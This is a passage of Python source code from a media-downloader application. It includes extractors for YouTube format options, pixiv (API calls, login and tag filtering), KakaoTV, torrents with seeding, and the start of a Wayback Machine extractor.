youtubeCombo_abr.setCurrentIndex(utils.ui_setting.youtubeCombo_abr.currentIndex()) aa = QWidget() a = QVBoxLayout(aa) a.setContentsMargins(0,0,0,0) a.addWidget(youtubeLabel_res) a.addWidget(youtubeLabel_abr) bb = QWidget() b = QVBoxLayout(bb) b.setContentsMargins(0,0,0,0) b.addWidget(youtubeCombo_res) b.addWidget(youtubeCombo_abr) layout.addRow(aa, bb) def currentIndexChanged(index): text_type = compatstr(youtubeCombo_type.currentText()) print(text_type) if tr_('동영상') in text_type: 
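            # 동영상 (video): hide the audio-bitrate widgets and show the
            # resolution widgets; the 음원 (audio) branch below does the reverse.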
youtubeLabel_abr.hide() youtubeCombo_abr.hide() youtubeLabel_res.show() youtubeCombo_res.show() elif tr_('음원') in text_type: youtubeLabel_res.hide() youtubeCombo_res.hide() youtubeLabel_abr.show() youtubeCombo_abr.show() youtubeCombo_type.currentIndexChanged.connect(currentIndexChanged) youtubeCombo_type.currentIndexChanged.emit(youtubeCombo_type.currentIndex()) buttonBox = QDialogButtonBox() layout.addWidget(buttonBox) buttonBox.setOrientation(Qt.Horizontal) buttonBox.setStandardButtons(QDialogButtonBox.Cancel | QDialogButtonBox.Ok) buttonBox.accepted.connect(win.accept) buttonBox.rejected.connect(win.reject) tr(win) win.setWindowOpacity(constants.opacity_max) try: res = win.exec() if not res: return selector.Cancel utils.windows.remove(win) format = {} format['format'] = compatstr(youtubeCombo_type.currentText()).lower().split()[0] format['res'] = get_resolution(compatstr(youtubeCombo_res.currentText())) format['abr'] = get_abr(compatstr(youtubeCombo_abr.currentText())) finally: win.deleteLater() return format @selector.options('youtube') def options(urls): return [ {'text': 'MP4 (동영상)', 'format': 'mp4', 'icon': 'movie'}, {'text': 'MP3 (음원)', 'format': 'mp3', 'icon': 'music'}, ] @selector.default_option('youtube') def default_option(): return compatstr(utils.ui_setting.youtubeCombo_type.currentText()).lower().split()[0] def get_streamer_name(url): if url.endswith('/live'): url = url[:-len('/live')] ydl = ytdl.YoutubeDL({'playlistend': 0}, type='youtube') info = ydl.extract_info(url) return info['channel'] class Live_youtube(utils.Live): type = 'youtube' @classmethod def is_live(cls, url): return ''.join(url.split('/')[3:4]).startswith('@') @classmethod def fix_url(cls, url): cn = url.split('/')[3].split('?')[0].split('#')[0] return f'https://youtube.com/{cn}/live' @classmethod def check_live(cls, url, info=None): if info is not None: try: info['title'] = get_streamer_name(url) except Exception as e: utils.log(print_error(e)) ydl = ytdl.YoutubeDL(type='youtube') try: _ = ydl.extract_info(url) return _.get('live_status') == 'is_live' except Exception as e: print(e) return False File: src/extractor/pixiv_downloader.py import downloader from utils import Downloader, urljoin, clean_title, LazyUrl, get_ext, get_print, try_n, compatstr, get_max_range, check_alive, query_url, Soup, limits import ffmpeg import utils import os import ree as re import errors from translator import tr_ from error_printer import print_error from urllib.parse import quote, unquote import constants from datetime import datetime import requests from timee import sleep from collections import deque from locker import lock import threading import clf2 from PIL import Image as Image_ ##import asyncio LIMIT = 48 for header in ['pixiv_illust', 'pixiv_bmk', 'pixiv_search', 'pixiv_following', 'pixiv_following_r18']: if header not in constants.available_extra: constants.available_extra.append(header) utils.TOKENS['pixiv'] = ['id', 'page', 'artist', 'artistid', 'title', 'date'] class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://accounts.pixiv.net/login', w=560, h=920) class Downloader_pixiv(Downloader): type = 'pixiv' MAX_CORE = 4 MAX_PARALLEL = 2 keep_date = True STEP = 4, 16 URLS = ['pixiv.me', 'pixiv.net'] ACCEPT_COOKIES = [r'(.*\.)?pixiv\.(com|co|net|me)'] def init(self): setattr(self.cw, 'sid?', None) res = clf2.solve(self.url, cw=self.cw) self.session = res['session'] #5105 soup = Soup(res['html']) if soup.find('a', href=lambda h: h and '/login.php' 
in h): def f(html, browser=None): soup = Soup(html) for div in soup.findAll('div'): if div.get('data-page-name') == 'LoginPage': browser.show() return False browser.hide() return True try: res = clf2.solve('https://accounts.pixiv.net/login', session=self.session, cw=self.cw, f=f, delay=3, w=560, h=920, timeout=120) except clf2.Timeout: raise LoginRequired() res = clf2.solve(self.url, session=self.session, cw=self.cw) soup = Soup(res['html']) err = soup.find('p', class_='error-message') if err: #5223 raise errors.Invalid(f'{err.text.strip()}: {self.url}') @classmethod def fix_url(cls, url): rt = utils.query_url(url).get('return_to') if rt: url = urljoin(url, rt[0]) if '/search_user.php?' in url: url = f'https://pixiv.me/{utils.query_url(url).get("nick")[0]}' if url.startswith('illust_'): url = f'https://www.pixiv.net/en/artworks/{url[len("illust_"):]}' elif url.startswith('bmk_'): url = f'https://www.pixiv.net/en/users/{url[len("bmk_"):]}/bookmarks/artworks' elif url.startswith('search_'): _ = quote(url[len('search_'):].replace('+', ' ')) url = f'https://www.pixiv.net/en/tags/{_}/artworks' elif url.startswith('following_r18_'): url = 'https://www.pixiv.net/bookmark_new_illust_r18.php' elif url.startswith('following_'): url = 'https://www.pixiv.net/bookmark_new_illust.php' elif not re.find(r'^https?://', url) and '.' not in url: url = f'https://www.pixiv.net/en/users/{url}' #3474 url = re.sub(r'(users/[0-9]+)/artworks$', r'\1', url) url = re.sub(r'[?&]p=[0-9]+$', '', url) if '://' not in url: #6082 url = 'https://' + url return url.strip('/') @classmethod def key_id(cls, url): return url.replace('://www.', '://').replace('/en/', '/').replace('http://', 'https://').lower() def read(self): ## loop = asyncio.new_event_loop() ## asyncio.set_event_loop(loop) try: info = get_info(self.url, self.session, self.cw) self.artist = info.get('artist') #4897 for img in info['imgs']: if isinstance(img, str): # local self.urls.append(img) continue self.urls.append(img.url) self.title = clean_title(info['title']) finally: ## loop.close() pass class PixivAPIError(LoginRequired): pass class HTTPError(Exception): pass class PixivAPI: def __init__(self, session, cw): self.session = session hdr = { 'Accept': 'application/json', 'Accept-Encoding': 'gzip, deflate', #6588 'Accept-Language': 'en-US,en;q=0.9,ko-KR;q=0.8,ko;q=0.7,ja;q=0.6', 'Cache-Control': 'no-cache', 'Pragma': 'no-cache', 'Referer': 'https://www.pixiv.net/', 'X-User-Id': my_id(session, cw), } self.session.headers.update(hdr) def illust_id(self, url): return re.find('/artworks/([0-9]+)', url) or re.find('[?&]illust_id=([0-9]+)', url) def user_id(self, url): return re.find('/users/([0-9]+)', url) or re.find('[?&]id=([0-9]+)', url) @try_n(8, sleep=5) @limits(1.5) #3355, #5105 def call(self, url): #print('call:', url) url = urljoin('https://www.pixiv.net/ajax/', url) e_ = None try: info = downloader.read_json(url, session=self.session) except requests.exceptions.HTTPError as e: code = e.response.status_code if code in (403, 404): e_ = HTTPError(f'{code} Client Error') else: raise e if e_: raise e_ err = info['error'] if err: raise PixivAPIError(info.get('message')) return info['body'] def illust(self, id_): return self.call(f'illust/{id_}') def pages(self, id_): return self.call(f'illust/{id_}/pages') def ugoira_meta(self, id_): return self.call(f'illust/{id_}/ugoira_meta') def profile(self, id_): return self.call(f'user/{id_}/profile/all') def top(self, id_): return self.call(f'user/{id_}/profile/top') def bookmarks(self, id_, offset=0, limit=None, 
rest='show'): if limit is None: limit = LIMIT return self.call(f'user/{id_}/illusts/bookmarks?tag=&offset={offset}&limit={limit}&rest={rest}') def search(self, q, order='date_d', mode='all', p=1, s_mode='s_tag_full', type_='all', scd=None, ecd=None, wlt=None, wgt=None, hlt=None, hgt=None, blt=None, bgt=None, ratio=None, tool=None): url = f'search/artworks/{quote(q)}?word={quote(q)}&order={order}&mode={mode}&p={p}&s_mode={s_mode}&type={type_}' if scd: url += f'&scd={scd}' if ecd: url += f'&ecd={ecd}' if wlt: url += f'&wlt={wlt}' if wgt: url += f'&wgt={wgt}' if hlt: url += f'&hlt={hlt}' if hgt: url += f'&hgt={hgt}' if blt: url += f'&blt={blt}' if bgt: url += f'&bgt={bgt}' if ratio: url += f'&ratio={ratio}' if tool: url += f'&tool={tool}' return self.call(url) def following(self, p, r18=False): #4077 mode = 'r18' if r18 else 'all' url = f'follow_latest/illust?p={p}&mode={mode}' return self.call(url) class Image: local = False def __init__(self, url, referer, id_, p, info, cw, ugoira=None): self._url = url self.id_ = id_ self.p = p self.artist = info['artist'] self.artistid = info['artist_id'] #3636 self.title = info['raw_title'] self.utime = info['create_date'] self.cw = cw self.ugoira = ugoira self.url = LazyUrl(referer, self.get, self, pp=self.pp, detect_local=not ugoira) def get(self, referer): d = { 'id': self.id_, 'page': self.p, 'artist': clean_title(self.artist, allow_dot=True), 'artistid': self.artistid, 'title': clean_title(self.title, allow_dot=True), #6433, #6592 'date': self.utime, } self.filename = utils.format('pixiv', d, get_ext(self._url)) if self.ugoira and self.ugoira['ext']: #3355 filename_local = os.path.join(self.cw.dir, self.filename) filename_local = f'{os.path.splitext(filename_local)[0]}{self.ugoira["ext"]}' if os.path.abspath(filename_local) in self.cw.names_old or os.path.exists(filename_local): #4534 self.filename = os.path.basename(filename_local) self.local = True return self._url def pp(self, filename): if self.ugoira and self.ugoira['ext'] and not self.local: if utils.ui_setting: dither = utils.ui_setting.checkDither.isChecked() quality = utils.ui_setting.ugoira_quality.value() else: dither = True quality = 90 filename_new = f'{os.path.splitext(filename)[0]}{self.ugoira["ext"]}' ffmpeg.gif(filename, filename_new, self.ugoira['delay'], dither=dither, quality=quality, cw=self.cw) utils.removeDirList.append((filename, False)) return filename_new def pretty_tag(tag): return tag.replace(' ', '').lower() @lock def tags_matched(tags_illust, tags_add, cw=None): print_ = get_print(cw) cache = cw.get_extra('pixiv_tag_cache') if cw else None init = True if cache is not None: init = False tags = set(cache['tags']) tags_ex = set(cache['tags_ex']) else: if utils.ui_setting and utils.ui_setting.groupBox_tag.isChecked(): tags_ = [compatstr(utils.ui_setting.tagList.item(i).text()) for i in range(utils.ui_setting.tagList.count())] else: tags_ = [] tags = set() tags_ex = set() for tag in tags_: tag = pretty_tag(tag) if tag.startswith('-'): tags_ex.add(tag[1:].strip()) else: tags.add(tag) if init: if cw: cache = {} cache['tags'] = list(tags) cache['tags_ex'] = list(tags_ex) cw.set_extra('pixiv_tag_cache', cache) print_(f'tags: [{", ".join(tags)}]') print_(f'tags_ex: [{", ".join(tags_ex)}]') if tags_add: tags.update((pretty_tag(tag) for tag in tags_add)) if init: print_(f'tags_add: {tags_add}') tags_illust = set(pretty_tag(tag) for tag in tags_illust) return (not tags or tags & tags_illust) and tags_ex.isdisjoint(tags_illust) def get_info(url, session, cw=None, depth=0, 
tags_add=None): print_ = get_print(cw) api = PixivAPI(session, cw) info = {} imgs = [] ugoira_ext = [None, '.gif', '.webp', '.png'][utils.ui_setting.ugoira_convert.currentIndex()] if utils.ui_setting else None max_pid = get_max_range(cw) if api.illust_id(url): # Single post id_ = api.illust_id(url) data = api.illust(id_) login = 'noLoginData' not in data if not login:# raise LoginRequired() if data['xRestrict'] and not login: raise LoginRequired('R-18') info['artist'] = data['userName'] info['artist_id'] = data['userId'] info['raw_title'] = data['illustTitle'] info['title'] = f'{info["raw_title"]} (pixiv_illust_{id_})' info['create_date'] = parse_time(data['createDate']) tags_illust = set(tag['tag'] for tag in data['tags']['tags']) if tags_matched(tags_illust, tags_add, cw): if data['illustType'] == 2: # ugoira data = api.ugoira_meta(id_) ugoira = { 'ext': ugoira_ext, 'delay': [frame['delay'] for frame in data['frames']], } img = Image(data['originalSrc'], url, id_, 0, info, cw, ugoira=ugoira) imgs.append(img) else: data = api.pages(id_) for img in data: img = Image(img['urls']['original'], url, id_, len(imgs), info, cw) imgs.append(img) else: print('tags mismatched') elif '/bookmarks/' in url or 'bookmark.php' in url: # User bookmarks id_ = api.user_id(url) if id_ is None: # id_ = my_id(session, cw) if id_ == my_id(session, cw): rests = ['show', 'hide'] else: rests = ['show'] process_user(id_, info, api) info['title'] = f'{info["artist"]} (pixiv_bmk_{info["artist_id"]})' ids = [] ids_set = set() for rest in rests: offset = 0 while len(ids) < max_pid: data = api.bookmarks(id_, offset, rest=rest) c = 0 for id in [work['id'] for work in data['works']]: if id in ids_set: continue ids_set.add(id) ids.append(id) c += 1 if not c: break offset += LIMIT if depth == 0: check_alive(cw) process_ids(ids, info, imgs, session, cw, depth) elif '/tags/' in url or 'search.php' in url: # Search q = unquote(re.find(r'/tags/([^/]+)', url) or re.find('[?&]word=([^&]*)', url, err='no tags')) info['title'] = f'{q} (pixiv_search_{q.replace(" ", "+")})' qs = query_url(url) order = qs.get('order', ['date_d'])[0] mode = qs.get('mode', ['all'])[0] s_mode = qs.get('s_mode', ['s_tag_full'])[0] scd = qs.get('scd', [None])[0] ecd = qs.get('ecd', [None])[0] type_ = qs.get('type', ['all'])[0] wlt = qs.get('wlt', [None])[0] wgt = qs.get('wgt', [None])[0] hlt = qs.get('hlt', [None])[0] hgt = qs.get('hgt', [None])[0] blt = qs.get('blt', [None])[0] bgt = qs.get('bgt', [None])[0] ratio = qs.get('ratio', [None])[0] tool = qs.get('tool', [None])[0] logs = [ f'order: {order}', f'mode: {mode}', f's_mode: {s_mode}', f'scd / ecd: {scd} / {ecd}', f'type: {type_}', f'wlt / wgt: {wlt} / {wgt}', f'hlt / hgt: {hlt} / {hgt}', f'blt / bgt: {blt} / {bgt}', f'ratio: {ratio}', f'tool: {tool}', ] print_('\n'.join(logs)) ids = [] ids_set = set() p = 1 while len(ids) < max_pid: data = api.search(q, order, mode, p=p, s_mode=s_mode, scd=scd, ecd=ecd, type_=type_, wlt=wlt, wgt=wgt, hlt=hlt, hgt=hgt, blt=blt, bgt=bgt, ratio=ratio, tool=tool) c = 0 for id in [illust['id'] for illust in data['illustManga']['data'] if 'id' in illust]: if id in ids_set: continue ids_set.add(id) ids.append(id) c += 1 if not c: break p += 1 process_ids(ids, info, imgs, session, cw, depth) elif 'bookmark_new_illust.php' in url or 'bookmark_new_illust_r18.php' in url or re.search(r'/users/[0-9]+/following', url): # Newest works: Following r18 = 'bookmark_new_illust_r18.php' in url id_ = my_id(session, cw) process_user(id_, info, api) info['title'] = f'{info["artist"]} 
(pixiv_following_{"r18_" if r18 else ""}{info["artist_id"]})' ids = [] ids_set = set() p = 1 while len(ids) < max_pid: data = api.following(p, r18=r18) c = 0 for id in data['page']['ids']: if id in ids_set: continue ids_set.add(id) ids.append(id) c += 1 if not c: break p += 1 process_ids(ids, info, imgs, session, cw, depth) elif api.user_id(url): # User illusts m = re.search(r'/users/[0-9]+/([\w]+)/?([^\?#/]*)', url) type_ = {'illustrations': 'illusts', 'manga': 'manga'}.get(m and m.groups()[0]) if type_: types = [type_] else: types = ['illusts', 'manga'] if m: tag = unquote(m.groups()[1]) or None else: tag = None print_(f'types: {types}, tag: {tag}') id_ = api.user_id(url) process_user(id_, info, api) data = api.profile(id_) info['title'] = f'{info["artist"]} (pixiv_{info["artist_id"]})' ids = [] for type_ in types: illusts = data[type_] if not illusts: continue ids += list(illusts.keys()) ids = sorted(ids, key=int, reverse=True) print_(f'ids: {len(ids)}') if not ids: raise Exception('no imgs') process_ids(ids, info, imgs, session, cw, depth, tags_add=[tag] if tag else None) else: raise NotImplementedError() info['imgs'] = imgs[:max_pid] return info def parse_time(ds): ds, z = ds[:-6], ds[-6:] dt = int(z[:3]) * 3600 + int(z[4:]) * 60 time = datetime.strptime(ds.replace(' ', ' '), '%Y-%m-%dT%H:%M:%S') time = (time-datetime(1970,1,1)).total_seconds() return time - dt @try_n(4, sleep=.5) #5469 def my_id(session, cw): print_ = get_print(cw) sid = session.cookies.get('PHPSESSID', domain='.pixiv.net', path='/') if not sid: raise LoginRequired() if cw is not None: _ = getattr(cw, 'sid?', None) if _ is None: setattr(cw, 'sid?', sid) print_(f'sid: {sid}') userid = re.find(r'^([0-9]+)', sid) if userid is None: raise LoginRequired() return userid def process_user(id_, info, api): info['artist_id'] = id_ data_user = api.top(id_) info['artist'] = data_user['extraData']['meta']['ogp']['title'] def process_ids(ids, info, imgs, session, cw, depth=0, tags_add=None): print_ = get_print(cw) max_pid = get_max_range(cw) names = cw.names_old table = {} for name in names: id = re.find(r'([0-9]+)_p[0-9]+.*\.(jpg|jpeg|png|apng|bmp|webp|gif)$', os.path.basename(name)) #5541 if id is None: continue ext = os.path.splitext(name)[1] if ext.lower() in ['.gif', '.webp']: #5541 try: img = Image_.open(name) n_frames = getattr(img, 'n_frames', 1) except Exception as e: print_(print_error(e)) n_frames = 1 if n_frames > 1: print_(f'ugoira: {name}') continue id = id[0] if id in table: table[id].append(name) else: table[id] = [name] c_old = 0 class Thread(threading.Thread): alive = True rem = 0 def __init__(self, queue): super().__init__(daemon=True) self.queue = queue @classmethod @lock def add_rem(cls, x): cls.rem += x def run(self): nonlocal c_old while self.alive: try: id_, res, i = self.queue.popleft() except: sleep(.1) continue try: names = table.get(str(id_)) if names is not None: res[i] = utils.natural_sort(names) c_old += 1 else: info_illust = get_info(f'https://www.pixiv.net/en/artworks/{id_}', session, cw, depth=depth+1, tags_add=tags_add) res[i] = info_illust['imgs'] except Exception as e: if depth == 0 and (e.args and e.args[0] == '不明なエラーが発生しました' or isinstance(e, errors.LoginRequired)): # logout during extraction res[i] = e print_(f'process_ids error (id: {id_}, d:{depth}):\n{print_error(e)}') finally: Thread.add_rem(-1) queue = deque() n, step = Downloader_pixiv.STEP print_(f'{n} / {step}') ts = [] for i in range(n): t = Thread(queue) t.start() ts.append(t) for i in range(0, len(ids), step): res = [[]]*step for 
j, id_illust in enumerate(ids[i:i+step]): queue.append((id_illust, res, j)) Thread.add_rem(1) while Thread.rem: sleep(.01, cw) for imgs_ in res: if isinstance(imgs_, Exception): raise imgs_ imgs += imgs_ s = f'{tr_("읽는 중...")} {info["title"]} - {len(imgs)}' if cw: cw.setTitle(s) else: print(s) if len(imgs) >= max_pid: break if depth == 0: check_alive(cw) for t in ts: t.alive = False print_(f'c_old: {c_old}') File: src/extractor/kakaotv_downloader.py import downloader import ytdl from utils import Downloader, try_n, LazyUrl, get_ext, format_filename from io import BytesIO as IO class Downloader_kakaotv(Downloader): type = 'kakaotv' URLS = ['tv.kakao'] single = True display_name = 'KakaoTV' ACCEPT_COOKIES = [r'(.*\.)?kakao\.com'] @classmethod def fix_url(cls, url): url = url.replace('.kakao.com/m/', '.kakao.com/') return url.split('?')[0].strip('/') def read(self): video = Video(self.url, cw=self.cw) video.url()# self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment() self.title = video.title class Video: _url = None def __init__(self, url, cw=None): self.url = LazyUrl(url, self.get, self) self.cw = cw @try_n(2) def get(self, url): if self._url: return self._url ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) fs = [f for f in info['formats'] if f['ext'] == 'mp4'] f = sorted(fs, key=lambda f: f['height'])[-1] self._url = f['url'] self.thumb_url = info['thumbnails'][0]['url'] self.thumb = IO() downloader.download(self.thumb_url, buffer=self.thumb) self.title = info['title'] ext = get_ext(self._url) self.filename = format_filename(self.title, info['id'], ext) return self._url File: src/extractor/torrent_downloader.py from utils import Downloader, clean_title, lock, json import constants, os, downloader from size import Size from timee import sleep from translator import tr_ import utils import filesize as fs from datetime import datetime import errors import ips import order from cacher import Cache torrent = None TIMEOUT = 1800 CACHE_INFO = True def isInfoHash(s): if len(s) != 40: return False try: bytes.fromhex(s) return True except: return False class Downloader_torrent(Downloader): type = 'torrent' URLS = [r'regex:^magnet:', r'regex:\.torrent$', isInfoHash] single = True update_filesize = False _info = None _name = None _filesize_prev = 0 _upload_prev = 0 _state = None _h = None _dn = None MAX_PARALLEL = 16 MAX_CORE = 0 skip_convert_imgs = True _filesize_init = False _max_speed = None _anon = False _proxy = '', '', 0, '', '' _seeding = False _virgin = True STOP_READING = False PRIORITY = -1 @classmethod def fix_url(cls, url): if isInfoHash(url): url = f'magnet:?xt=urn:btih:{url}' return url @classmethod def set_max_speed(cls, speed): cls._max_speed = speed cls.updateSettings() @classmethod def set_anon(cls, flag): cls._anon = flag cls.updateSettings() @classmethod def set_proxy(cls, protocol, host, port, username, password): cls._proxy = protocol, host, port, username, password cls.updateSettings() @classmethod @lock def updateSettings(cls): if torrent is None: print('torrent is None') return torrent.set_max_speed(cls._max_speed) torrent.set_anon(cls._anon) torrent.set_proxy(*cls._proxy) @classmethod def _import_torrent(cls): global torrent if torrent is None: import torrent @lock def __init(self): self._import_torrent() Downloader_torrent.updateSettings() @classmethod def key_id(cls, url): if torrent is None: #print('torrent is None') return url id_, e = torrent.key_id(url) if e: print(e) return id_ @property def name(self): if self._name is None: 
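            # Compute the torrent's display name from its metadata once and
            # cache it; clean_title() sanitizes it for use as a file/directory name.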
self._name = clean_title(self._info.name()) return self._name @classmethod def get_dn(cls, url): if not url: return if url.startswith('magnet:'): qs = utils.query_url(url) if 'dn' in qs: return utils.html_unescape(qs['dn'][0]) def read(self): cw = self.cw self.cw.pbar.hide() self.__init() if cw: cw._torrent_s = None self._dn = self.get_dn(cw.gal_num) info = getattr(cw, 'info?', None) if info is not None: self.print_('cached info') self._info = info if self._info is None: if not (self.url.startswith('http') or self.url.startswith('magnet:')) and not os.path.exists(self.url): sr = cw.serial_retry if sr is not None: self.url = json.loads(sr)['url'] or self.url try: self._info = torrent.get_info(self.url, cw, timeout=TIMEOUT, callback=self.callback) if CACHE_INFO: setattr(cw, 'info?', self._info) except: self.update_pause() if not cw.paused: raise errors.Invalid(f'Faild to read metadata: {self.url}', fail=True) if self._info is None: cw.paused = True if cw.paused: return hash_ = self._info.hash.hex() self.print_(f'v2: {self._info.v2}') self.print_(f'Hash: {hash_}') if not self._info.v2: self.url = f'magnet:?xt=urn:btih:{hash_}'# date = datetime.fromtimestamp(self._info.creation_date()) date = date.strftime('%y-%m-%d %H:%M:%S') self.print_(f'Created on: {date}') self.print_(f'Total size: {fs.size(self._info.total_size())}') self.print_(f'Pieces: {self._info.num_pieces()} x {fs.size(self._info.piece_length())}') self.print_(f'Creator: {self._info.creator()}') self.print_(f'Comment: {self._info.comment()}') cw.setTotalFileSize(self._info.total_size()) cw.imgs.clear() cw.dones.clear() self.urls = [self.url] self.title = self.name self.update_files() if not self.single and not os.path.isdir(self.dir): #4698 downloader.makedir_event(self.dir, cw) cw.pbar.show() def update_files(self): cw = self.cw files = torrent.get_files(self._info, cw=cw) if not files: raise Exception('No files') cw.single = self.single = len(files) <= 1 index = [0]*len(files) filesize = [] for i, file in enumerate(files): filename = os.path.join(self.dir, file.path) cw.imgs.append(filename) index[file.index] = i filesize.append(file.size) self._torrent_index = index self._torrent_filesize = filesize def update_pause(self): cw = self.cw if cw.pause_lock: if self._seeding: cw.pause_lock = False return cw.pause_data = { 'type': self.type, 'url': self.url, } cw.paused = True cw.pause_lock = False self.update_tools_buttons() def start_(self): cw = self.cw cw.pbar.setFormat('%p%') cw.setColor('reading') cw.downloader_pausable = True self._seeding = False pr = cw.get_extra('pr') if cw.paused: #data = cw.pause_data cw.paused = False cw.pause_lock = False self.update_tools_buttons() try: self.read() if self.status == 'stop': self.stop() return True if cw.paused: pass else: cw.dir = self.dir cw.urls[:] = self.urls cw.clearPieces() self.size = Size() self.size_upload = Size() cw.pbar.setMaximum(self._info.total_size()) cw.setColor('reading') if pr is None and utils.ui_setting.torrentSelectFiles.isChecked(): from utils import QApplication, QStyle, QIcon cache_icon = Cache(1024) files = torrent.get_files(self._info) icon_size = QApplication.style().pixelMetric(QStyle.PM_ListViewIconSize) def _getIcon(name): ext = os.path.splitext(name)[1] key_icon = icon_size, ext.lower() icon = cache_icon.get(key_icon) if icon is None: pixmap = utils.image_reader.getFilePixmap(name, size=icon_size, pad=0) icon = QIcon() icon.addPixmap(pixmap) cache_icon.set(key_icon, icon) return icon done = False res = None def f(): nonlocal done, res try: while True: res 
= order.getOrder([[True, file.path] for file in files], utils.ui.listWidget, self.title, tr_('파일을 고르세요:'), True, size=(600, 600), icon=_getIcon, move=False) if res is None or any(item[0] for item in res): break utils.messageBox('No files selected', self.title, icon=utils.QMessageBox.Warning, parent=utils.ui.listWidget) finally: done = True utils.exec_queue.run(f) while True: sleep(1, cw) if done: break if res: pr = [None] * len(files) for file, item in zip(files, res): pr[file.index] = int(item[0]) cw.set_extra('pr', pr) else: raise errors.Invalid(f'Canceled: {self.url}') torrent.download(self._info, save_path=self.dir, callback=self.callback, cw=cw, pr=pr) self.update_progress(self._h) cw.setSpeed(0.0) cw.setUploadSpeed(0.0) if not cw.alive: return self.update_pause() if cw.paused: return True self.title = self.name if not self.single: cw.pbar.setMaximum(len(cw.imgs)) finally: cw.clearPieces() try: # for Item.showFiles cw.set_extra('torrent_progress', torrent.get_file_progress(self._h, self._info, False)) except Exception as e: cw.remove_extra('torrent_progress') self.print_error(e) self._h = None def _updateIcon(self): cw = self.cw n = 4 for try_ in range(n): if cw.setIcon(cw.imgs[0], icon=try_==n-1): break sleep(.5) def update_progress(self, h): if self._info is None: return cw = self.cw if not cw.imgs: #??? self.print_('???') self.update_files() cw.setPieces(torrent.pieces(h, self._info)) def callback(self, h, s, alerts): try: return self._callback(h, s, alerts) except Exception as e: self.print_error(e) return 'abort' def _callback(self, h, s, alerts): self._h = h cw = self.cw if self._virgin: self._virgin = False try: ips.get('0.0.0.0') except Exception as e: self.print_error(e) if self._state != s.state_str: self._state = s.state_str self.print_(f'state: {s.state_str}') title = (self._dn or self.url) if self._info is None else self.name try: if cw.alive and cw.valid and not cw.pause_lock: seeding = False cw._torrent_s = s self.update_progress(h) filesize = s.total_done upload = s.total_upload color = 'downloading' if s.state_str in ('downloading', 'seeding'): # init filesize if not self._filesize_init: self._filesize_prev = filesize self._filesize_init = True self.print_(f'init filesize: {fs.size(filesize)}') # download d_size = filesize - self._filesize_prev self._filesize_prev = filesize self.size += d_size downloader.total_download_size_torrent += d_size # upload d_size = upload - self._upload_prev self._upload_prev = upload self.size_upload += d_size downloader.total_upload_size_torrent += d_size if self._info is not None: cw.pbar.setValue(s.progress * self._info.total_size()) if s.state_str == 'queued': color = 'reading' title_ = f'{tr_("대기 중...")} {title}' elif s.state_str == 'checking files': color = 'reading' title_ = f'{tr_("파일 체크 중...")} {title}' self._filesize_prev = filesize elif s.state_str == 'downloading': title_ = f'{title}' cw.setFileSize(filesize) cw.setSpeed(self.size.speed) cw.setUploadSpeed(self.size_upload.speed) elif s.state_str == 'seeding': cw.setFileSize(filesize) if not cw.seeding: return 'abort' seeding = True title_ = f'{tr_("시딩...")} {title}' cw.setSpeed(self.size_upload.speed) elif s.state_str == 'reading': color = 'reading' title_ = f'{tr_("읽는 중...")} {title}' elif s.state_str == 'finished': return 'abort' else: title_ = f'{s.state_str.capitalize()}... 
{title}' cw.setTitle(title_, update_filter=False) cw.setColor(color) self._seeding = seeding else: self.print_('abort') if cw: cw._torrent_s = None return 'abort' finally: if alerts: if not cw.imgs: #??? self.print_('??? 2') self.update_files() names = cw.names for alert in alerts: what = alert['what'] if what == 'file_completed': index = alert['index'] index = self._torrent_index[index] try: file = os.path.abspath(names[index]) except IndexError: continue #??? cw.dones.add(file) file = constants.compact(file).replace('\\', '/') files = file.split('/') file = ' / '.join(files[1:]) filesize = self._torrent_filesize[index] msg = f'Completed: {file} | {fs.size(filesize)}' self.print_(msg) if index == 0: self._updateIcon() else: raise NotImplementedError(what) @utils.actions('torrent') def actions(cw): if cw.type != 'torrent': return items = [item for item in cw.listWidget().selectedItems() if item.type == 'torrent'] seeding = int(all(item._seeding for item in items)) * 2 if not seeding: seeding = int(all(item._seeding is False for item in items)) if not seeding: seeding = 0 if all(item._seeding is None for item in items) else None if seeding is None: mix_seeding = any(item._seeding for item in items) mix_no_seeding = any(item._seeding is False for item in items) mix_pref = any(item._seeding is None for item in items) else: mix_seeding = mix_no_seeding = mix_pref = False return [ {'icon': 'list', 'text': '파일 목록', 'clicked': cw.showFiles}, {'icon': 'peer', 'text': 'Peers', 'clicked': cw.showPeers}, {'icon': 'tracker', 'text': '트래커 수정', 'clicked': cw.editTrackers}, {'text':'-'}, {'text': '시딩', 'clicked': lambda:cw.setSeedings(True), 'checkable': True, 'checked': seeding==2, 'group': 'seeding', 'mixed': mix_seeding}, {'text': '시딩 하지 않음', 'clicked': lambda:cw.setSeedings(False), 'checkable': True, 'checked': seeding==1, 'group': 'seeding', 'mixed': mix_no_seeding}, {'text': '설정을 따름', 'clicked': lambda:cw.setSeedings(None), 'checkable': True, 'checked': seeding==0, 'group': 'seeding', 'mixed': mix_pref}, ] File: src/extractor/wayback_machine_downloader.py # coding: utf8 # title: Wayback Machine Downloader # author: bog_4t import downloader import concurrent.futures import os import ree as re from hashlib import md5 from ratelimit import limits, sleep_and_retry from utils import Downloader, Session, clean_title, get_print, print_error class Downloader_wayback_machine(Downloader): type = 'waybackmachine' URLS = ['archive.org', 'web.archive.org'] display_name = 'Wayback Machine' MAX_CORE = 1 def read(self): filter_ = Filter(self.url, self.cw) self.url = f'https://web.archive.org/cdx/search/cdx?url={filter_.url}' self.title = filter_.title self.urls.extend(get_imgs(self.url, filter_, self.dir, self.session, self.cw)) self.title = filter_.title class WaybackMachineAPI: def __init__(self, session, cw=None): self.session = session self.cw = cw self.params = { 'output': 'json', 'fl': 'timestamp,original', 'filter': 'mimetype:text/html&filter=statuscode:200', 'collapse': 'urlkey' } @sleep_and_retry @limits(1, 5) def call(self, url): for (key, value) in self.params.items(): url += f'&{key}={value}' return downloader.read_json(url, session=self.session) def snapshots(self, url): data = self.call(url) return data[1:] class Filter: domains = [ 'twitter.com' ] def __init__(self, url, cw=None): self.cw = cw self.url = re.findall(r'archive.[^/]+/(?:cdx/search/cdx\?url=|(?:web/)?(?:[^/]+/))(.+)', url.lower())[0].strip('/') self.base_url = self.url.split('&')[0].strip('/') self.md5 = 
